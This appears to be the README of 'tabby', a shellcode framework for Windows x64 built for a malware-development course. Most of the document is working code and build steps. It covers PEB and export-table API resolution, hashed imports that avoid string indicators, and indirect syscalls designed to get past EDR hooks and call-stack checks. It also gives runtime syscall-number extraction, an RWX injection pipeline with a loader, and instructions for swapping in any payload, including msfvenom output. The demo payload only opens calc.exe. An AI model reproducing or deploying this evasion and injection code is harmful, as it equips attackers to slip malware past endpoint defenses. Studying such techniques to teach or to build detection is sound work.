a minimal, position-independent C shellcode micro framework for Windows x64.
compiles entirely on Linux with mingw-w64 and nasm. output is a flat raw binary (shellcode.bin) with no PE header, no imports, no CRT - ready to inject into any process.
designed for the course Malware Development for Ethical Hackers (2026).
a position-independent C shellcode framework that compiles entirely on Linux and produces flat raw bytes that survive injection into any Windows x64 process - with EDR-evading indirect NT syscalls baked in.
the four ideas that hold it together:
write shellcode in C, not assembly. - you write a normal sc_main(PVOID base) function. the framework handles PIC, base-address recovery, API resolution, and syscall dispatch. The asm is confined to a 20-line entry stub and 3-instruction syscall stubs generated by a macro.
no PE header, no IAT, no CRT. - output is a flat .bin blob starting at byte 0 with _start at offset 0. No imports - every Windows API is resolved at runtime by FNV-1a hash via PEB walk + EAT walk. No libc - STACKSTR builds strings on the stack so they never appear in .rdata.
indirect syscalls that look clean on the call stack. - instead of executing syscall ourselves (which leaves our shellcode as the return address - flagged by call-stack-aware EDRs), each stub jumps to the syscall; ret gadget that already exists inside ntdll's own stub, past the EDR's inline hook. The kernel sees a return address inside ntdll.
linux-only toolchain. - mingw-w64 + nasm + a custom linker script + objcopy. Zero Windows dependency to build.
the framework is small enough to read end-to-end in one sitting (~500 lines of C + ~80 lines of NASM) and every component answers a specific detection problem:
entry.asm - how does shellcode find its own base address? (RDIP)
resolve.c - how do we call Windows APIs with no IAT? (PEB + EAT walk)
pic.h - how do we avoid string IOCs? (FNV-1a hashes + STACKSTR)
stubs.asm - how do we bypass EDR hooks on ntdll? (indirect syscalls)
syscall.c - how do we get SSNs without hardcoding them? (runtime extraction)
flat.ld - how do we produce raw bytes from a normal toolchain? (linker script + objcopy)
other projects either hide these mechanics behind code generators (SysWhispers) or are too big to study (Cobalt Strike). tabby is the minimum viable framework that makes each technique inspectable.
not a C2 or post-exploitation framework.
not a packer or crypter for existing PE files.
not a polished offensive tool - it's a teaching framework for "Malware Development for Ethical Hackers" trainings. the README documents the why of every design decision (the project structure rationale table) precisely because the goal is for the reader to understand the choices, not just run the binary.
before using this tool, you need to understand four ideas that the whole framework is built on. Each one is a direct answer to a specific detection problem.
a normal Windows EXE assumes it will be loaded at a fixed virtual address. the linker hard-codes absolute addresses for every function call, global variable, and string literal. If the code is copied somewhere else in memory and jumped into, those hard-coded addresses point to garbage and the process crashes.
shellcode must work regardless of where it lands in memory. Every reference to data or other code must be relative to the current instruction pointer.
on x86-64 this is mostly natural: CALL rel32 and LEA reg, [rip+N] are both RIP-relative by design. The problems are:
strings and constants. The compiler normally puts them in .rdata at a fixed address. We merge .rdata into .text via the linker script and generate them on the stack at runtime with the STACKSTR macro.
global variables. The SSN slots and the gadget pointer must live somewhere the stubs can find them via [rel label]. We keep them in .text too; the linker script discards .data and .bss.
_start at byte 0. The entry object is pinned first in the linker script so jumping to the first byte of shellcode.bin always lands in _start.
the entry stub (asm/entry.asm) uses a classic RDIP trick to recover its own load address:
call .here
.here:
pop rcx ; rcx = runtime address of .here
sub rcx, (.here - _start) ; rcx = base of shellcodethis gives sc_main() a pointer to the shellcode's own base, useful if you embed a secondary payload or config block after the code.
every Windows API call in a normal program goes through the Import Address Table. the PE loader fills the IAT at load time by calling LoadLibrary and GetProcAddress on your behalf. A flat shellcode blob has no IAT. we have to find APIs ourselves.
the mechanism is a walk of the Process Environment Block (PEB):
gs:[0x60] -> PEB
└─ Ldr -> PEB_LDR_DATA
└─ InLoadOrderModuleList (doubly-linked)
├─ ntdll.dll
├─ kernel32.dll
└─ ...
every loaded DLL appears in this list with its base address and name. once we have a module base we walk its Export Address Table (EAT) - three parallel arrays of names, ordinals, and function RVAs - to find a specific export by name.
comparing strings at runtime is noisy and leaves IOCs. We compare hashes instead. The hash function is FNV-1a 32-bit (fast, good distribution, trivial to implement without a CRT):
DWORD fnv1a(const char *s) {
DWORD h = 0x811c9dc5;
while (*s) { h ^= (BYTE)*s++; h *= 0x01000193; }
return h;
}pre-computed hash constants live in include/ntapi.h. Use tools/hash.py to generate or verify them:
$ python3 tools/hash.py NtAllocateVirtualMemory ntdll.dll
NtAllocateVirtualMemory -> 0xca67b978u
ntdll.dll -> 0xa62a3b3buDLL names are matched case-insensitively (lowercased in the LDR walk). export names are case-sensitive because the EAT preserves the original casing.
calling NtAllocateVirtualMemory from our shellcode in the normal way (call the ntdll export) is caught by every modern EDR. The EDR installs an inline hook - it overwrites the first bytes of the ntdll stub with a JMP into the EDR's own code, which inspects the call before letting it proceed.
Direct syscalls bypass the hook by putting the system call number (SSN) into EAX and executing syscall ourselves:
mov eax, 0x18 ; SSN for NtAllocateVirtualMemory
mov r10, rcx ; NT ABI: r10 must mirror rcx
syscallthis dodges the hook, but creates a new problem: the thread call stack shows our_shellcode+N -> NtAllocateVirtualMemory. Call-stack-aware EDRs flag any syscall whose return address is not inside ntdll.
indirect syscalls fix this. Instead of executing syscall ourselves, we jump to the syscall; ret instruction that already exists inside ntdll's own stub - past the hook:
ntdll!NtAllocateVirtualMemory:
4C 8B D1 mov r10, rcx <- hook overwrites here
B8 18 00 00 00 mov eax, 0x18
0F 05 syscall <- we jump to here
C3 ret
now the return address that the kernel sees is inside ntdll. The call stack looks clean.
the SSN is extracted at runtime by scanning the ntdll stub for the mov eax, imm32 byte pattern (0xB8). this works even on hooked stubs because hooks typically overwrite the first bytes (the mov r10, rcx prologue) while leaving the mov eax bytes intact further down:
static DWORD extract_ssn(PBYTE stub) {
for (int i = 0; i < 32; i++) {
if (stub[i] == 0xB8) {
DWORD ssn = *(DWORD *)(stub + i + 1);
if (ssn < 0x600) return ssn; // sanity: no NT SSN is >= 0x600
}
}
return (DWORD)-1;
}a Windows PE is compiled for Windows but the compilation itself is just translating C source and ASM to machine code. mingw-w64 is a complete win64 cross-compiler that runs on Linux and produces native Windows COFF object files and PE executables.
the flat binary extraction step uses objcopy to peel the .text section out of the PE wrapper:
C source -> x86_64-w64-mingw32-gcc -> Win64 COFF .o
ASM -> nasm -f win64 -> Win64 COFF .o
COFF .o -> x86_64-w64-mingw32-ld -> PE .elf (single .text section)
PE .elf -> x86_64-w64-mingw32-objcopy -> shellcode.bin (raw bytes)nothing in this pipeline touches Windows. the output runs on Windows because the machine code is win64 ABI compliant.
tabby/
├── include/
│ ├── types.h windows types from scratch - no SDK, no CRT headers
│ ├── pic.h FNV-1a hash, STACKSTR macro, GETAPI helper, module hashes
│ └── ntapi.h NT function pointer types, sc_* declarations, hash constants
├── src/
│ ├── crt.c sc_memcpy / sc_memset / sc_memcmp / sc_strlen
│ ├── resolve.c find_module (PEB walk) + resolve_export (EAT walk) + find_syscall_gadget
│ └── syscall.c SSN extraction + syscall_init()
├── asm/
│ ├── entry.asm _start at byte 0: RDIP -> sc_main(base)
│ └── stubs.asm SSN slots + g_syscall_gadget + indirect syscall stubs (8 NT functions)
├── ld/
│ └── flat.ld linker script: flatten .text and .rdata$* into single .text at offset 0
├── example/
│ ├── exec.c minimal demo: PEB walk -> kernel32 -> WinExec("calc.exe")
│ └── alloc_exec.c full demo: syscall init -> NtAlloc -> NtWrite -> NtProtect RWX -> NtCreateThreadEx
└── tools/
├── hash.py FNV-1a pre-computation for ntapi.h constants
└── loader.c minimal Win64 test loader: maps shellcode.bin and executes it install on Ubuntu / Debian:
sudo apt install mingw-w64 nasm binutils-mingw-w64-x86-64that is all. No MSVC, no Windows SDK, no Wine.
git clone https://github.com/cocomelonc/tabby
cd tabby
makeexpected output:
nasm -f win64 -I include/ asm/entry.asm -o obj/entry.o
nasm -f win64 -I include/ asm/stubs.asm -o obj/stubs.o
x86_64-w64-mingw32-gcc ... -c src/crt.c -o obj/crt.o
x86_64-w64-mingw32-gcc ... -c src/resolve.c -o obj/resolve.o
x86_64-w64-mingw32-gcc ... -c src/syscall.c -o obj/syscall.o
x86_64-w64-mingw32-gcc ... -c example/alloc_exec.c -o obj/alloc_exec.o
x86_64-w64-mingw32-ld -T ld/flat.ld --gc-sections -o bin/shellcode.elf ...
x86_64-w64-mingw32-objcopy --only-section=.text -O binary ...
[=^..^=] shellcode.bin 1760 bytesthe only warning (section below image base) is expected - we intentionally place .text at virtual address 0 so the flat binary starts at byte 0.
output: bin/shellcode.bin - a raw x64 shellcode blob.
a smaller standalone test shellcode (PEB walk + WinExec only, no indirect NT syscalls) is also available:
make exec # produces bin/exec.bin (~416 bytes)useful for sanity-checking the framework on a new target before exercising the full NT syscall path.
disassemble the first bytes on Linux to confirm _start is at offset 0:
ndisasm -b 64 bin/shellcode.bin | head -20expected:
00000000 53 push rbx
00000001 57 push rdi
00000002 56 push rsi
00000003 4883EC20 sub rsp,byte +0x20 ; shadow space, preserves 16-byte alignment
00000007 E800000000 call 0xc
0000000C 59 pop rcx ; <- RDIP trick
0000000D 4883E90C sub rcx,byte +0xc ; rcx = base of shellcode
00000011 E8XXXXXXXX call sc_main
...
0000001E 6690 xchg ax,ax ; padding to 0x20
00000020 0000 ssn_NtAllocateVirtualMemory (dd 0, populated at runtime)
00000024 0000 ssn_NtWriteVirtualMemory
...
00000040 0000 g_syscall_gadget (dq 0)
00000048 8B0500000000 mov eax,[rel ssn_NtAllocateVirtualMemory] ; <- first syscall stubthe RDIP sequence at 0x07–0x0D is the canonical PIC base-address recovery.
SSN slots and the gadget pointer live in .text (offsets 0x20–0x47) so they survive the objcopy --only-section=.text extraction and remain reachable via RIP-relative addressing at any load address.
the first syscall stub starts at 0x48.
bin/shellcode.bin is a raw byte blob - not an executable. to run it on Windows you need a loader: a normal Win32 program that maps the blob into memory and jumps into it.
on Linux, cross-compile tools/loader.c with:
make loaderthis produces bin/loader.exe using mingw-w64 - no Windows required.
copy both files to the same folder on the Windows machine:
bin/shellcode.bin
bin/loader.exe.\loader.exe shellcode.binor, to test the smaller standalone shellcode first:
.\loader.exe exec.binboth pop calc.exe. the difference is that exec.bin calls WinExec directly (PEB walk + EAT walk only), while shellcode.bin does the full indirect-NT-syscall injection pipeline (NtAllocateVirtualMemory -> NtWriteVirtualMemory -> NtProtectVirtualMemory -> NtCreateThreadEx) with exec.bin's bytes as the embedded payload.
if exec.bin pops calc but shellcode.bin does not, the bug is somewhere in the indirect-syscall path (SSN extraction, gadget address, stub calling convention, or NtCreateThreadEx arguments) - not the framework basics.
fopen("shellcode.bin", "rb") // reads the raw bytes
VirtualAlloc(NULL, sz, RW) // allocates a private RW region
fread -> buf // copies shellcode in
VirtualProtect(buf, sz, RWX) // flips the region to execute-read-write
CreateThread(buf) // spawns a thread at byte 0
WaitForSingleObject(thread, INFINITE) // waits for shellcode to return
VirtualFree + CloseHandle // cleans upthe region is mapped RWX (not RX) because syscall_init() writes the extracted SSN values into the shellcode's own .text section at runtime. without write access the first store would #AV and the thread would terminate silently.
the loader prints the load address before jumping so you can attach a debugger at the right offset if needed:
[=^..^=] loaded 1760 bytes from shellcode.bin
[=^..^=] executing at 0x000001A2B3C40000the bundled example payload (example/alloc_exec.c) spawns calc.exe:
- allocates a fresh RW region via
NtAllocateVirtualMemory(indirect syscall) - writes an embedded mini-shellcode (
PAYLOAD[]=example/exec.ccompiled output: PEB walk ->WinExec("calc.exe")) - flips the region to RWX via
NtProtectVirtualMemory - spawns a thread on it via
NtCreateThreadEx - waits for the thread, closes the handle, frees the region
swap PAYLOAD[] with any position-independent x64 shellcode and rebuild with make.
- copy
example/alloc_exec.corexample/exec.cas a starting template, or create a new file inexample/. - write a
sc_main(PVOID base)function. If you call anysc_Nt*stub, callsyscall_init(ntdll)first.baseis the runtime address of byte 0 of your shellcode, useful if you embed config or a secondary payload after the code. - add a build rule for your
.cfile inMakefileand list its.oinC_OBJS(or replacealloc_exec.o). - run
make(ormake execfor a variant that excludes the syscall stubs entirely).
PVOID ntdll = find_module(H_NTDLL);
PVOID kernel32 = find_module(H_KERNEL32);to resolve any export by name:
typedef HANDLE (*GetStdHandle_t)(DWORD);
GetStdHandle_t pGetStdHandle = (GetStdHandle_t) resolve_export(kernel32, H_GetStdHandle);or with the GETAPI macro:
HANDLE h = GETAPI(H_KERNEL32, H_GetStdHandle, GetStdHandle_t)(STD_OUTPUT_HANDLE);after syscall_init(ntdll), call the sc_Nt* functions exactly like the real NT API:
PVOID region = NULL;
SIZE_T size = 4096;
NTSTATUS st = sc_NtAllocateVirtualMemory(
(HANDLE)-1, // current process
®ion,
0,
&size,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
if (!NT_SUCCESS(st)) { // handle error }available stubs:
| function | args | notes |
|---|---|---|
sc_NtAllocateVirtualMemory |
6 | allocate memory in a process |
sc_NtWriteVirtualMemory |
5 | write across process boundary |
sc_NtProtectVirtualMemory |
5 | change page protection |
sc_NtFreeVirtualMemory |
4 | release allocation |
sc_NtCreateThreadEx |
11 | spawn thread in local or remote process |
sc_NtWaitForSingleObject |
3 | wait on a handle |
sc_NtClose |
1 | close a handle |
sc_NtTerminateProcess |
2 | terminate a process |
do not write:
const char *msg = "hello"; // ends up in .rdata -> fixed address -> crashUse STACKSTR instead:
STACKSTR(msg, "hello"); // pushed onto the stack character by characterstep 1 - add the SSN slot and stub to asm/stubs.asm (slot lives in .text, not .bss, so it survives flat-binary extraction):
global ssn_NtOpenProcess
ssn_NtOpenProcess: dd 0
STUB NtOpenProcess, ssn_NtOpenProcessthe STUB macro is a single, ABI-clean stub - no argument shifting needed for any number of arguments because the Win64 calling convention already places args 5+ at [rsp+28h], exactly where the kernel reads them.
step 2 - declare the SSN extern and add the LOAD_SSN call inside src/syscall.c:
extern DWORD ssn_NtOpenProcess;
...
LOAD_SSN(ssn_NtOpenProcess, H_NtOpenProcess);step 3 - add the hash constant to include/ntapi.h:
#define H_NtOpenProcess 0xXXXXXXXXucompute it:
python3 tools/hash.py NtOpenProcessstep 4 - declare the prototype in include/ntapi.h:
NTSTATUS sc_NtOpenProcess(HANDLE *, DWORD, OBJECT_ATTRIBUTES *, CLIENT_ID *);take sc_NtAllocateVirtualMemory as the example. the caller in C is:
sc_NtAllocateVirtualMemory((HANDLE)-1, ®ion, 0, &size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);win64 calling convention maps this to:
RCX = (HANDLE)-1
RDX = ®ion
R8 = 0
R9 = &size
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE <- 5th arg on stack
[RSP+0x30] = PAGE_READWRITE <- 6th arg on stackinside the stub:
sc_NtAllocateVirtualMemory:
mov eax, dword [rel ssn_NtAllocateVirtualMemory] ; EAX <- SSN
mov r10, rcx ; R10 <- RCX (NT ABI)
jmp qword [rel g_syscall_gadget]three instructions. that's it. the stub does not touch the stack, does not shift arguments, and does not modify RSP. the Win64 calling convention already places args 5+ at [rsp+28h], [rsp+30h], ... and the kernel reads them from those exact offsets after syscall. nothing extra to do.
at the point of JMP, the register and stack state is:
EAX = SSN
R10 = (HANDLE)-1 <- arg 1 (kernel reads R10, not RCX, after syscall)
RDX = ®ion <- arg 2
R8 = 0 <- arg 3
R9 = &size <- arg 4
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE <- arg 5
[RSP+0x30] = PAGE_READWRITE <- arg 6the JMP lands at the syscall; ret bytes inside ntdll's own NtAllocateVirtualMemory stub, past any EDR hook. The kernel executes the syscall and rets back to the call site inside ntdll. The call stack that the kernel and any call-stack scanner observes has a return address inside ntdll - not inside our shellcode.
the example/alloc_exec.c demo ships with the compiled bytes of example/exec.c (PEB walk -> WinExec("calc.exe")) as PAYLOAD[]. To use your own:
static const BYTE PAYLOAD[] = {
// paste your x64 shellcode bytes here
0x48, 0x31, 0xc0, ...
};regenerate the bytes from a fresh make exec build:
make exec
python3 -c "
data = open('bin/exec.bin','rb').read()
for i in range(0, len(data), 12):
print(' ' + ', '.join(f'0x{b:02x}' for b in data[i:i+12]) + ',')
"or generate shellcode with any external framework (msfvenom, donut, your own) and paste the byte array.
the framework handles allocation, write, protection flip, and thread creation - you only need to provide the bytes.
| decision | reason |
|---|---|
-nostdlib -nostdinc -ffreestanding |
zero CRT dependency; everything in the binary came from our own source |
-fno-builtin |
prevents GCC emitting implicit memcpy/memset calls to CRT |
-mno-red-zone |
Win64 does not honour the System V red zone; without this, signal delivery or asynchronous callbacks can corrupt our stack frame |
-mcmodel=small |
critical: forces direct IMAGE_REL_AMD64_REL32 relocations for global symbol access. without it, mingw64 emits .refptr.<sym> indirection through .rdata that holds the absolute link-time VMA. for our flat binary with . = 0 that VMA is meaningless at runtime; every SSN store would crash with #AV |
-fno-asynchronous-unwind-tables |
suppresses .eh_frame generation; we discard it anyway but this avoids linker noise |
-ffunction-sections -fdata-sections + ld --gc-sections |
dead-code elimination: drops unused symbols (e.g. sc_memcpy if no STACKSTR is large enough to need it) so the binary contains only what's actually called |
-Os |
size optimisation keeps shellcode small; also discourages the compiler from emitting CRT helper calls |
nasm -f win64 |
produces Win64 COFF objects compatible with mingw-w64-ld; full access to NASM macros for clean stub generation |
SSN slots in .text (via NASM dd 0) |
mingw64 places C globals in .bss, which our linker script discards. defining the slots in NASM's .text section guarantees they survive objcopy --only-section=.text and the stubs' [rel ssn_*] displacements resolve correctly |
linker script at . = 0 + .rdata$* .text$* merged into .text |
lets objcopy --only-section=.text produce a flat binary starting at offset 0 with no PE overhead; the $* wildcards catch COFF section groups emitted by -ffunction-sections/-fdata-sections |
entry stub sub rsp, 0x20 (not 0x28) |
after push rbx/rdi/rsi the stack is already 16-aligned. sub rsp, 0x20 (32, a multiple of 16) preserves alignment so sc_main receives the Win64-ABI-correct RSP mod 16 = 8. otherwise MOVAPS inside any Windows DLL (e.g. CreateProcess inside WinExec) raises #AC and the thread dies silently |
| FNV-1a over CRC32 | equally fast, no special instructions required, fits in 6 lines of C |
| per-function SSN slots | avoids a generic do_syscall(ssn, ...) wrapper that would need to shift a variable number of stack arguments; each stub has the exact Win64 signature the kernel expects |
this tool is a proof of concept for educational purposes only. the author takes no responsibility for any damage caused by misuse.










